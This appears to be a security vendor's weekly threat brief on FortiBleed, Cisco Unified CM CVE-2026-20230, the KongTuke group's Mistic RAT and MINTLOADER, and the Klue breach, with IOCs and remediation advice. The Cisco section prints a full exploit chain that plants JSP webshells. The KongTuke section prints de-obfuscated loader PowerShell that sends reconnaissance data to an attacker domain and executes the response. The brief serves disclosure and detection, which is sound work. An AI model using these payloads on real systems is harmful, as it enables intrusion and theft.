← All threat briefs
Threat Brief

Weekly Situation Report — 6/29/26

Key takeaways

  • An update to the FortiBleed incident details use of custom tooling used by threat actors in post compromise activities, alongside credential-centric exploitation.
  • Cisco Unified CM flaw CVE-2026-20230 claimed to be exploited in the wild. Attackers used known unverified and likely fake PoC, while real PoC is disclosed.
  • KongTuke initial access broker uses new Mistic RAT in attacks, while also pivoting to abusing Cisco Spark in recent attacks.
  • Klue breach continues to affect technology and cybersecurity firms, with LastPass being its latest victim.

1. FortiBleed update: Custom FortigateSniffer tool used to steal credentials

Summary

New research on FortiBleed disclosed analysis of the toolset used during intrusions, which recently impacted 75,000 Fortinet FortiGate devices and resulted in the leakage of hashed passwords.

Category: Threat actor activities

Industry: Technology, Financial and Fintech, Public Sector and Government Administration

Analyst comments

Researchers have detailed a large-scale FortiBleed campaign targeting Fortinet FortiGate devices, where custom sniffers were used to harvest authentication secrets and steal credentials from over 430,000 firewalls globally since at least February 2026. This most recent incident has affected 75,000 FortiGate devices based on disclosed compromise lists. The threat actors, operating as initial access brokers, used custom tooling that included a Golang-based tool called “FortigateSniffer” to exploit FortiOS’s diagnose sniffer packet functionality to monitor network traffic. This tool captured authentication traffic from compromised devices, while Python and Hashcat tooling extracted and cracked credentials and password hashes from the collected data. Additional custom tooling was used for post compromise activity to find stored passwords or hashes stored within configuration files and scripts stored on the compromised FortiGate devices.

Initial access was typically gained by identifying exposed FortiGate devices through tools such as Shodan or Masscan, then using credential based attacks such as brute forcing, credential stuffing, and password guessing against weak credentials. The threat actor also appears to conduct longer term post-compromise activities using FortigateSniffer to identify credentials and hashes transmitted over the network, while also searching files on compromised devices for stored credentials. Code comments suggest Russian attribution, although the specific group remains unknown. Public reporting indicates that known victims are primarily located in India and the United States, which largely aligns with the current distribution of exposed FortiGate devices in those regions.

Confirmed IOCs:

# Aggregator
85.11.187.8

# Credential Validation
193.8.187.42

# Pentest Lab host
193.8.187.2

# FortigateSniffer/ Scanner
85.11.187.100-101
85.11.187.103
85.11.187.105
85.11.187.107-121
193.8.187.26
194.113.39.71
77.91.122.13
77.91.122.31
77.91.122.33
77.91.122.35
77.91.122.39
85.11.187.64
85.11.187.66
85.11.187.68
85.11.187.72
85.11.187.90
85.11.187.92
85.11.187.94
85.11.187.98
179.43.166.170
188.127.246.183
193.8.187.6
193.8.187.10
193.8.187.14
193.8.187.22
194.113.39.45
194.113.39.47
194.113.39.49
194.113.39.53
194.113.39.73
194.113.39.75
194.113.39.79

# Proxy rotation
45.144.115.10
62.197.149.124
77.91.96.136
77.91.122.43
80.246.31.105
83.48.92.67
85.11.187.8
85.11.187.12
85.11.187.16
85.11.187.20
85.11.187.36
85.11.187.40
85.11.187.44
85.11.187.74
85.11.187.76
85.11.187.102
85.11.187.123-124
85.11.187.127
85.11.187.132-139
85.11.187.141
85.11.187.143-149
85.11.187.150-187
85.11.187.190
85.11.187.192
85.11.187.194-197
85.11.187.200
85.11.187.203
85.11.187.206
85.11.187.215-223
85.11.187.227
85.11.187.232-242
85.11.187.248
85.11.187.252
85.11.187.254
87.249.133.20
87.249.133.79
89.187.163.211
91.214.78.143
95.214.217.25
96.18.56.78
96.18.57.90
96.43.51.7
99.9.111.82
102.50.247.12
103.21.149.215
103.50.219.186
103.80.60.70
103.88.80.163
103.124.165.105
103.154.55.145
103.194.242.134
104.160.114.124
107.0.184.92
146.70.224.23
146.70.231.15
147.45.45.202
152.89.216.207
179.43.166.138
185.65.133.22
185.65.133.193
188.127.226.252
192.253.248.42
193.8.187.30
193.8.187.34
193.8.187.38
193.8.187.42
193.8.187.46
193.138.7.164
194.113.39.26
194.113.39.71
194.113.39.104-105
194.113.39.107-110
194.113.39.122-123
194.113.39.125-127
194.113.39.131
194.113.39.135
194.113.39.141-146
194.113.39.151
194.113.39.158-162
194.113.39.174
194.113.39.176-181
194.113.39.183
194.113.39.192-196
194.113.39.198
194.113.39.200
194.113.39.206
194.113.39.210-214
194.113.39.219
194.113.39.225-231
194.113.39.238
194.113.39.243-248
194.127.167.114
213.171.17.74

Associated ASN data based on a represented sample from the above list:

45.144.115[.]10 United States AS62240 Clouvider Clouvider HB -
62.197.149[.]124 Lithuania AS209854 Cyberzone S.A. Cyberzone S.A -
77.91.96[.]136 Vietnam AS205775 NEON CORE NETWORK LLC Partner Hosting LTD -
77.91.122[.]5 Georgia AS201814 MEVSPACE sp. z o.o. WorkTitans B.V -
80.246.31[.]105 Latvia AS43513 Sia Nano IT - -
83.48.92[.]67 Spain AS3352 TELEFONICA DE ESPANA S.A.U. - 67.red-83-48-92.staticip.rima-tde.net
85.11.187[.]8 Bulgaria AS211486 Alferov Aleksey Aleksandrovich Sofcompany speedy -
87.249.133[.]20 Austria AS212238 Datacamp Limited Datacamp Limited unn-87-249-133-20.datapacket.com
89.187.163[.]211 Singapore AS60068 Datacamp Limited Cdn77 SGP EQ3 unn-89-187-163-211.cdn77.com
91.214.78[.]143 Georgia AS205775 NEON CORE NETWORK LLC Partner Hosting LTD -
95.214.217[.]25 Poland AS136787 PacketHub S.A. Packethub S.A -
96.18.56[.]78 United States AS11492 CABLE ONE, INC. Sparklight 96-18-56-78.cpe.sparklight.net
96.18.57[.]90 United States AS11492 CABLE ONE, INC. Sparklight 96-18-57-90.cpe.sparklight.net
96.43.51[.]7 United States AS23404 Ritter Communications Ritter Communications 96-43-51-7.ritternet.com
99.9.111[.]82 United States AS7018 AT&T Enterprises, LLC AT&T Enterprises, LLC -
102.50.247[.]12 Morocco AS6713 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM - -
103.21.149[.]215 Vietnam AS38732 CMC Telecom Infrastructure Company CMCTELECOM -
103.50.219[.]186 India AS133971 Rmax Broadband Pvt ltd Rmax Broadband Pvt ltd 186.219.50.103-rmaxisp.com
103.80.60[.]70 India AS139562 Jolly Broadband Pvt Ltd Jolly Broadband Pvt Ltd 103.80.60.70.dynamic-jollybroadband.net
103.88.80[.]163 India AS136676 Kad-syscon Infotech Private Limited Kad-syscon Infotech Private Limited -
103.124.165[.]105 Albania AS197706 Keminet SHPK - -
103.154.55[.]145 India AS138754 Kerala Vision Broad Band Private Limited Colleagues Cable Net Pvt Ltd keralavisionisp-dynamic-145.55.154.103.keralavisionisp.com
103.194.242[.]134 India AS134326 Airdesign Broadcast Media Pvt Ltd Airdesign Broadcast Media Pvt Ltd -
104.160.114[.]124 United States AS393844 Pine Telephone Company, INC. Pine Telephone Company, INC. -
107.0.184[.]92 United States AS7922 Comcast Cable Communications, LLC Comcast Cable Communications, Inc. -
146.70.224[.]23 Hong Kong AS9009 M247 Europe SRL M247 Ltd HONG KONG -
146.70.231[.]15 Russia AS9009 M247 Europe SRL M247 Ltd Moscow -
147.45.45[.]202 The Netherlands AS205775 NEON CORE NETWORK LLC Partner Hosting LTD -
152.89.216[.]207 Russia AS56694 LLC Smart Ape - s400359.srvape.com
179.43.166[.]138 Switzerland AS51852 Private Layer INC Private Layer Inc hostedby.privatelayer.com
185.65.133[.]22 Finland AS39351 31173 Services AB 31173 Services AB -
188.127.226[.]252 Russia AS56694 LLC Smart Ape SmartApe s1592411.srvape.com
188.127.246[.]183 Czechia AS62212 SmartApe OU ESA s1573571.srvape.com
192.253.248[.]42 United Kingdom AS213790 Limited Network LTD Secure Internet LLC -
193.8.187[.]2 United Kingdom AS206378 FOP Dmytro Nedilskyi CojuhariSolutions -
193.138.7[.]164 Finland AS50304 Blix Solutions AS Blixcust10412 s1931387164.blix.com
194.113.39[.]26 Ukraine AS206378 FOP Dmytro Nedilskyi WAIcore Ltd -
194.127.167[.]114 Estonia AS43357 Owl Limited Owl Limited -
213.171.17[.]74 Russia AS56694 LLC Smart Ape SmartApe s1584257.srvape.com

Actionable guidance

Credentials should be rotated and MFA should be enforced for all users. FortiGate and other Fortinet devices should be upgraded to the latest versions available, including all current hot fixes as these devices are the primary infiltration point for the threat actor.

Administrators should audit devices for potential compromise, including administrator logins from unknown sources or activity occurring at unusual times without attribution to known employees. If compromise is confirmed, the device should be rebuilt as there is a high likelihood that a backdoor may have been planted.

Management interfaces should not be exposed to the public internet, as this expands the attack surface and creates additional opportunities for attackers. If any of the listed network IoCs are observed in network traffic, incident response investigations should be started to determine if a compromise has occurred.

2. Cisco Unified CM flaw CVE-2026-20230 claimed to be exploited in attacks with fake PoC, real PoC disclosed

Summary

A critical SSRF vulnerability in Cisco Unified Communications Manager Server, CVE-2026-20230, allows unauthenticated attackers to gain root access through improper input validation, despite available security updates.

Category: Known exploited vulnerabilities

Industry: Technology, Public Sector and Government Administration, Telecommunications

Analyst comments

A high-severity server side request forgery (SSRF) vulnerability, CVE-2026-20230, in Cisco Unified Communications Manager Server allows unauthenticated attackers to gain root privileges through improper validation of HTTP requests. Cisco released updates for this flaw on June 3, emphasizing the critical nature of the exploit. Threat intelligence researchers reported active exploitation, noting that attacks are using specific file:// payloads to write files, such as a test file named ‘/tmp/cve-2026-20230-test.txt’, to identify vulnerable devices. SSD Secure provided a technical write-up and PoC, detailing that exploitation abuses the Webdialer component to write arbitrary files and ultimately achieve remote code execution, though exploitation requires knowledge of the target hostname.

While the vulnerability has been reported as exploited in the wild, the currently available data appears to match IoCs of an initial PoC released about 3 weeks ago. That PoC came from a user known for AI-generated or false PoCs, although they have previously published working PoCs after prior disclosure. The text file naming also appears to align with the released code. The original vulnerability researchers have now published technical details, and some of those details do not fully align with the exploitation activity reported by threat intelligence researchers.

Threat intelligence researchers claim CVE-2026-20230 exploitation based on the following:

# Claimed exploitation - matches https://github.com/HORKimhab/CVE-2026-20230/blob/main/cve-2026-20230.py

POST /webdialer/Webdialer HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0(compatible; CVE-2026-20230-PoC)
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

dest=file%3A%2F%2F%2Ftmp%2Fcve-2026-20230-test-txt&url=file%3A%2F%2F%2Ftmp%2Fcve-2026-20230-test-txt&action=doSomething&phoneNumber=test

Confirmed and verified real PoC multi-step exploitation as detailed by the vulnerability researchers:

# Get hostname data - sample request

GET /cmplatform/installClusterStatusExecute?action=clusterNodeInstallStatus&hostname=%76%6d%30%31%2f%77%65%62%64%69%61%6c%65%72%2f%73%65%72%76%69%63%65%73%2f%41%64%6d%69%6e%53%65%72%76%69%63%65%2f%70%6c%61%74%66%6f%72%6d%63%6f%6d%2f%61%70%69%2f%76%31%2f%73%6f%66%74%77%61%72%65%2f%69%6e%73%74%61%6c%6c%73%74%61%67%65%73%2f%3f%6d%65%74%68%6f%64%3d%21%2d%2d%25%33%45%25%33%43%64%65%70%6c%6f%79%6d%65%6e%74%25%32%30%78%6d%6c%6e%73%25%33%44%25%32%32%68%74%74%70%25%33%41%25%32%46%25%32%46%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%25%32%46%61%78%69%73%25%32%46%77%73%64%64%25%32%46%25%32%32%25%32%30%78%6d%6c%6e%73%25%33%41%6a%61%76%61%25%33%44%25%32%32%68%74%74%70%25%33%41%25%32%46%25%32%46%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%25%32%46%61%78%69%73%25%32%46%77%73%64%64%25%32%46%70%72%6f%76%69%64%65%72%73%25%32%46%6a%61%76%61%25%32%32%25%33%45%25%33%43%73%65%72%76%69%63%65%25%32%30%6e%61%6d%65%25%33%44%25%32%32%72%61%6e%64%6f%6d%52%31%31%25%32%32%25%32%30%70%72%6f%76%69%64%65%72%25%33%44%25%32%32%6a%61%76%61%25%33%41%52%50%43%25%32%32%25%33%45%25%33%43%72%65%71%75%65%73%74%46%6c%6f%77%25%33%45%25%33%43%68%61%6e%64%6c%65%72%25%32%30%74%79%70%65%25%33%44%25%32%32%6a%61%76%61%25%33%41%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%68%61%6e%64%6c%65%72%73%2e%4c%6f%67%48%61%6e%64%6c%65%72%25%32%32%25%32%30%25%33%45%25%33%43%70%61%72%61%6d%65%74%65%72%25%32%30%6e%61%6d%65%25%33%44%25%32%32%4c%6f%67%48%61%6e%64%6c%65%72%2e%66%69%6c%65%4e%61%6d%65%25%32%32%25%32%30%76%61%6c%75%65%25%33%44%25%32%32%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%2e%2e%25%32%46%63%6f%6d%6d%6f%6e%25%32%46%6c%6f%67%25%32%46%74%61%6f%73%2d%6c%6f%67%2d%61%25%32%46%74%6f%6d%63%61%74%25%32%46%77%65%62%61%70%70%73%25%32%46%70%6c%61%74%66%6f%72%6d%2d%73%65%72%76%69%63%65%73%25%32%46%61%78%69%73%32%2d%77%65%62%25%32%46%61%61%61%2e%6a%73%70%25%32%32%25%32%30%25%32%46%25%33%45%25%33%43%70%61%72%61%6d%65%74%65%72%25%32%30%6e%61%6d%65%25%33%44%25%32%32%4c%6f%67%48%61%6e%64%6c%65%72%2e%77%72%69%74%65%54%6f%43%6f%6e%73%6f%6c%65%25%32%32%25%32%30%76%61%6c%75%65%25%33%44%25%32%32%66%61%6c%73%65%25%32%32%25%32%30%25%32%46%25%33%45%25%33%43%25%32%46%68%61%6e%64%6c%65%72%25%33%45%25%33%43%25%32%46%72%65%71%75%65%73%74%46%6c%6f%77%25%33%45%25%33%43%70%61%72%61%6d%65%74%65%72%25%32%30%6e%61%6d%65%25%33%44%25%32%32%63%6c%61%73%73%4e%61%6d%65%25%32%32%25%32%30%76%61%6c%75%65%25%33%44%25%32%32%6a%61%76%61%2e%75%74%69%6c%2e%52%61%6e%64%6f%6d%25%32%32%25%32%30%25%32%46%25%33%45%25%33%43%70%61%72%61%6d%65%74%65%72%25%32%30%6e%61%6d%65%25%33%44%25%32%32%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%25%32%32%25%32%30%76%61%6c%75%65%25%33%44%25%32%32%2a%25%32%32%25%32%30%25%32%46%25%33%45%25%33%43%25%32%46%73%65%72%76%69%63%65%25%33%45%25%33%43%25%32%46%64%65%70%6c%6f%79%6d%65%6e%74&filename=bbbbbb HTTP/1.1

URL Decoded:

vm01/webdialer/services/AdminService/platformcom/api/v1/software/installstages/?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomR11%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fcommon%2Flog%2Ftaos-log-a%2Ftomcat%2Fwebapps%2Fplatform-services%2Faxis2-web%2Faaa.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment

# Create webshell on server

GET /webdialer/services/randomR11?method=nextInt&arg0=%3C%21%5BCDATA%5B%0A%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new+java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E+%0A%5D%5D%3E

payload decoded:

<![CDATA[
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
]]>

# Writing command shell to server

GET /platform-services/axis2-web/aaa.jsp?f=../../../../../../../common/log/taos-log-a/tomcat/webapps/platform-services/axis2-web/c.jsp&t=%3c%25%20if(%22123%22.equals(request.getParameter(%22pwd%22)))%7b%20java.io.InputStream%20in%20%3d%20Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20out.print(%22%3cpre%3e%22)%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20out.print(%22%3c%2fpre%3e%22)%3b%20%7d%20%25%3e

decoded payload:
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

# commandshell use after exploitation

https://192.168.220.139/platform-services/axis2-web/c.jsp?pwd=123&i=id

The second, more complex item is the real PoC disclosed by vulnerability researchers. The original exploitation reported by the threat intelligence researcher is unlikely to reflect activity from a sophisticated actor or organized threat group. However, the release of the genuine vulnerability details will likely drive broader exploitation in the wild. We are not currently aware of any verified data tied to the recently disclosed exploitation method. Based on the original report, the known network IOC is primarily associated with residential proxy networks and spam activity.

156.146.38.167 - AS60068 datacamp limited - Dallas, TX US

Actionable guidance

The vendor has released patches and mitigation strategies that address this issue. Organizations should also avoid exposing these devices to the public internet, as doing so increases the likelihood of exploitation by external threat actors. Exploitation will likely follow the chain request below, with the assumption that a webshell or other malware may be uploaded to a vulnerable server instance:

GET /cmplatform/installClusterStatusExecute
GET /webdialer/services/randomR11
GET /platform-services/axis2-web/<unknown jsp file>

3. KongTuke initial access broker adds “Mistic” RAT to their arsenal, in addition to MINTLOADER and shift to Cisco Spark abuse

Summary

An initial access broker known as KongTuke has been using a new RAT called Backdoor.Mistic since April 2026 to target multiple industries through social engineering and compromised sites. The threat actor is linked to various ransomware groups for brokering initial access.

Category: Threat actor activities

Industry: Multiple

Analyst comments

Researchers report that an initial access broker (IAB) known as KongTuke (aka WoodGnat), active since May 2024, has started using a new remote access trojan (RAT) called Backdoor.Mistic (also known as MLTBackdoor). KongTuke, having connections to ransomware groups like Qilin and Black Basta, deploys Mistic as a DLL and uses techniques such as credential stealing and social engineering to compromise networks. The RAT provides capabilities like file manipulation and code execution and is deployed alongside tools like PowerShell and Certutil for extensive network manipulation and data exfiltration.

Mistic RAT/ MLTBackdoor may likely be a variant of a Havoc C2 binary, due in part to at least one sample that contained metadata of the executable with company and product names listed as “Nuance Communications / Dragon Data Protection” associated with “endpointdlp.dll”. The company and product names point to Havoc C2. Later samples did not have this metadata, which may indicate this was in error by the threat actor and have since corrected newer versions by removing the identifying metadata, however further verification is needed. Based on recent samples uploaded to public malware repositories, the newest samples seen were from the middle of May.

New KongTuke sample submissions tied to this threat actor show heavy use of MINTLOADER across a majority of reported samples. MINTLOADER is a PowerShell loader designed to execute further stages of the threat actors attack chain.

Since April 2026, the threat actor has utilized helpdesk and IT-support lures via Microsoft Teams to trick victims into running malicious code for initial compromise, in addition continued use of ClickFix and related techniques. Recent samples suggest a shift from Teams abuse to Cisco Spark abuse, based on .tar archives observed in early June that contained several executables and .dll files related to the Cisco product.

Persistence commonly includes registry runkeys, scheduled tasks, start-up folder abuse, with files typically dropped within the user’s AppData folder under Local\Temp. As the threat actor abuses Traffic Distribution Systems (TDS), domains and network addresses change often, so detection should focus on the group’s behaviors and tooling rather than static network indicators.

IOCs

# Sample associated with Havoc C2 metadata
endpointdlp.dll - b3680e0512ae78b0a7145930ea2f88507050b2b753c6403e20ac02e66156ab23

# Extracted metadata, associated with Havoc C2 activity
Nuance Communications, Inc.
Data Protection Policy Engine
Copyright (C) 2024 Nuance Communications
Dragon Data Protection

# Known Mistic RAT/ MLTBackdoor samples
1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984
Stage one loader.

46b2155c1e71b840d4b7a2e94410b89a61e2446523e6f497206d402eb02e0e93
Archive with stage one loader and encrypted MLTBackdoor.

9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66
MLTBackdoor with domains and DGA.

ced6b0f44410f6133ad63b61e04613a8b56cc3338d7b34497540e9541163e7ec
MLTBackdoor DGA only.

1d09357b6a096fdc35cd5c873eed15665d6b3c879d20c8cf01e6bca0005512cf
MLTBackdoor DGA only.

2cd88d5280a61714836f5f07a16df190911c5b952af2998dbbcda910b3b1c494
MLTBackdoor domains only.

d34e4038c5c80728f9648ba84833f69bc1ccea82e2e8e748b7b7f02fb687b92b
1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984 -- Backdoor.Mistic - endpointdlp.dll
34d798a6c55e57ed0932b6499f4fbcb5454bdfca903307be101a0594b0ac07bc - Fake lock screen - f.dll
3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be - Backdoor.Mistic - aeff97fe.msi
59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712 - Loader for backdoor - version.dll
8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235 - Likely privilege escalation - n.dll
afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c - Backdoor.Mistic - endpointdlp.dll
db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5 - Backdoor.Mistic - endpointdlp.dll
f591275a8f014b29e567529d67c54eb7bb4473db1c38737d6bfd5b3d52c9344e - Backdoor.Mistic - 48b47c0.msi
fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a - Backdoor.Mistic - endpointdlp.dll

Samples and files from d.tar Cisco Spark use shift:

# KongTuke potential Cisco Spark abuse samples (analysis pending) dropped from d.tar
CiscoSparkCrypto.dll - f28192652a4f03f88c50a330829e1981d44d2bc7b8ba82cd104ed7c3d0801bee
CiscoSparkSync.dll - ca212a330f9d6d0320e3b327ca7e1c30b773baf8ec5705a62030fc6968b54686
CiscoSparkScheduler.dll - ca212a330f9d6d0320e3b327ca7e1c30b773baf8ec5705a62030fc6968b54686
CiscoSparkDiagnostics.dll - 1c7bee0fbc8871079970db80af0b73bef9bc743a322c0db2801e7c01031eb354
CiscoCollabHost.exe - c70b5fada48ce5e4ade6b111bc1b1d38e177c553798655227bd87f2ff2532fe8
CiscoSparkLauncher.dll - 1aa0acd867e7b7786457abc9257d7186bb05bab87747784b26f90c0289169f69
CiscoSparkCompliance.dll - 3d6188b2aff430184bfb9aebac10bca755fb407520203ac1a9737dc6f07a6f62
CiscoSparkCore.dll - b447412d2ca4c82957f14f34affbc0c4836611099bd83890e110ed7a16b118d9
CiscoSparkServices.dll - 3d0e4316449e45cd9783e684cd3beca9fe555ef5a325da71ef3b51a67c3bd39d
CiscoSparkMonitor.dll - d59a4c3b2283efe642a361e680564f5ac515803b5b237c85cf25f019b7cc005e
wintrust.dll - cdfae9f1d9702545972c1aee9e349cd3df4e6be8550f5d35ca3c508c6c9a7dc7
2 (text file) - 1fcba8090d0bc5e80b9537a0a3c6a611d427a0da082a693af2947f610a83f4d2
CiscoSparkRuntime.dll - 71f8961e8ac848070e1a1e7551b0939de4fc858ea94a0e579f8e2361f2fba157
CiscoSparkBridge - 3d86cd1def4c9f534b7b77c9f62a0061a26f10f576e00fa02ab396161196c92e

Recent MINTLOADER sample with de-obfuscated assembled PowerShell command:
MINTLOADER sample dated 6/24/26 - Building next-stage PowerShell command

# SfofTJHmckNHMHLeAkFMzYUBpvSywd
$YZzCvgiyy = 266445
$syvoZhfwt = 204223
$gqLnHGiTc = 179464
$qDXuMGwsv = 284115
$AnIHQgFzK = 126760
$JfxJsyMVV = 742466
$kjKIrUmyh = 695583
$uNopvtwvE = 825935
$qLIMmxJgY = 703066
$wUFWjEMzs = 484533
$TPWXHzLbmmn = <base64 data>
$iUArdOSgibw = [byte[]]@(138,58,224,127,26,5,120,4,189,226,19)

# XswGsdiUeeqUUutYutUgBWxQtkxWcA
function plcMkBSRNUQasV {
param([string]$data, [byte[]]$k)
$b64 = [Convert]::FromBase64String($data)
$S = 0..255; $j = 0
for($i=0; $i -lt 256; $i++){
$j = ($j + $S[$i] + $k[$i % $k.Length]) % 256
$S[$i], $S[$j] = $S[$j], $S[$i]
}
$i=$j=0; $dec=@()
foreach($byte in $b64){
$i = ($i + 1) % 256
$j = ($j + $S[$i]) % 256
$S[$i], $S[$j] = $S[$j], $S[$i]
$dec += ($byte -bxor $S[($S[$i] + $S[$j]) % 256])
}
$ms = New-Object IO.MemoryStream(,$dec)
$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gz)
return $sr.ReadToEnd()
}

# WXGRECwpIcLrWFLsjImRakWYdVLJeO
# Indirect execution
$TvzxtfqoGQn = & (Get-Command plcMkBSRNUQasV).ScriptBlock $TPWXHzLbmmn $iUArdOSgibw

# NiieiPwZPTXpKGeEyOdBmFuBaZLBLF
function vNRDVFhgtMaf { try { [GC]::Collect() } catch {} }

# mDodkcqQXXoVFVAzpvschUMsXxETDi
$kHEjpXkcxKQ = 'In' + 'vok' + 'e-Ex' + 'pres' + 'sion'

# aTYihrCPyoPPsVCxgQqHREROfwoQhD
& $kHEjpXkcxKQ $TvzxtfqoGQn

# tFXmSvnNbKOoJfMRjUjvULAMwsNzRW
# BCRBmRSCzuHBeaZIAeARDCJQxWwToCWbYbQBKWwypjEis

Output of PowerShell command used by MINTLOADER:

# Out of PowerShell command with primary use being reconnaissance activities
$domain = (Get-CimInstance Win32_ComputerSystem).Domain
if ($domain -eq 'WORKGROUP') {
iwr 'https://ext4-v.top/m' `
-Method POST `
-Body @{
message = "ABCD111`n$(
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct |
Select-Object -ExpandProperty DisplayName |
Out-String
)"
} `
-ContentType 'application/x-www-form-urlencoded' `
-UseBasicParsing | iex
}
else {
$domain = (Get-CimInstance Win32_ComputerSystem).Domain
$av = (Get-CimInstance -Namespace root/SecurityCenter2 -Class AntivirusProduct).displayName -join ', '
$dcCount = (net group "Domain Computers" /domain 2>$null | Select-String '\$').Count * 3
$message = "BCDA222`nAV: $av`n| $domain |`nAD: $dcCount"
iwr -Uri 'https://ext4-v.top/m' -Method POST -Body @{message=$message} -ContentType 'application/x-www-form-urlencoded' -useb | iex
}

Actionable guidance

Since the threat actor uses PowerShell in MINTLOADER related attack chains, organizations should restrict PowerShell for most non-IT users to limit attack progression. Users should also receive guidance on ClickFix and related campaigns, while disabling the Win + R shortcut through default user group policy may reduce the likelihood of initial infection.

Teams should examine the presence of RMM software, unattributed registry changes, and file system activity, especially excessive writes to AppData\Local\Temp. Use of living off the land binaries and scripts, including certutil.exe, should generate alerts for further investigation.

4. Downstream attacks from Klue breach affect LastPass

Summary

Several downstream breaches of Salesforce data have affected multiple prominent security vendors including LastPass, Huntress, Jamf, and Recorded Future. The compromised data does not appear to be sensitive and is primarily associated with sales activity.

Category: Confirmed breach

Industry: Technology

Analyst comments

Several prominent security and technology companies have been affected by the Klue compromise of extortion actor Icarus. The threat actor successfully breached the Salesforce data of several of these companies, which contributed to downstream compromises against affected organizations. Recent examples include Salesforce data leaks affecting cybersecurity firms like Huntress and password security organization LastPass. This activity is similar to the attacks perpetrated by ShinyHunters and other COM related hackers.

In regards to LastPass specifically, the company has stated that the data does not include credentials, PII, or other sensitive data. However, the advisory from LastPass also states that support data was also included in the breach. While the majority of the data is not classed as sensitive, user submitted support data might contain sensitive data related to troubleshooting LastPass issues. The threat actor’s dark web presence is no longer online, so further analysis of the breach contents cannot be verified. The current list of compromised organizations affected by the Klue breach include the following:

  • LastPass
  • Huntress
  • HackerOne
  • ReliaQuest
  • Snyk
  • Tanium
  • BeyondTrust
  • Recorded Future
  • Gong
  • Jamf
  • OneTrust
  • Sprout Social
  • Insurity
  • Pendo
  • 8x8

Icarus is a recent threat actor that uses API automation, OAuth token phishing, and pressure tactics while extorting victims with stolen data. There are no updates to the actors currently known IOCs. The IOCs are provided below for easy reference:

# Network indicators
Note: All of these IPs were noted as sending spam in their histories based on data from Spamhaus.

138.226.246[.]94 The Netherlands AS43641 SOLLUTIUM EU Sp z.o.o. - erdbau-marchart[.]com
212.86.125[.]24 The Netherlands AS43641 SOLLUTIUM EU Sp z.o.o. Vsys AMS mail.attilexag[.]com
213.111.148[.]90 Ukraine AS6698 Virtual Systems LLC Vsys Cheap VPS simonis.resagning[.]com
94.154.32[.]160 France AS214961 Stellar Group SAS Individual entrepreneur Dyachenko Valentina Ivanovna - cheatingwithmilfs[.]com

# User-Agent strings
"Python-urllib/3.12"
"Python-urllib/3.14"
5238

# Email domains
house.com.au
robinskitchen.com.au
baccarat.com.au

# Exploited API endpoints for Klue related data
/services/data/v59.0/sobjects
/services/data/v59.0/query

Actionable guidance

Organizations that partner with any of the affected companies should audit the level of information that is submitted to the breached companies. In the case of LastPass, support tickets were also affected which may contain sensitive billing or credential information submitted. Other companies may have seen similar impact to their environments, therefore partnerships should audit the level of data being shared and obtain clear guidance on what potential information could have been affected by this event. If a partner is confirmed to have been affected by this breach, it is recommended that partner accounts have their credentials rotated and ensure that MFA is applied for all users, while restricting the Device Code Flow to prevent potential OAuth device phishing attacks that the threat actor has used during this breach.


Get the Complete Report

The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec’s original threat research. Delivered weekly to partners and clients. REQUEST ACCESS

More briefs
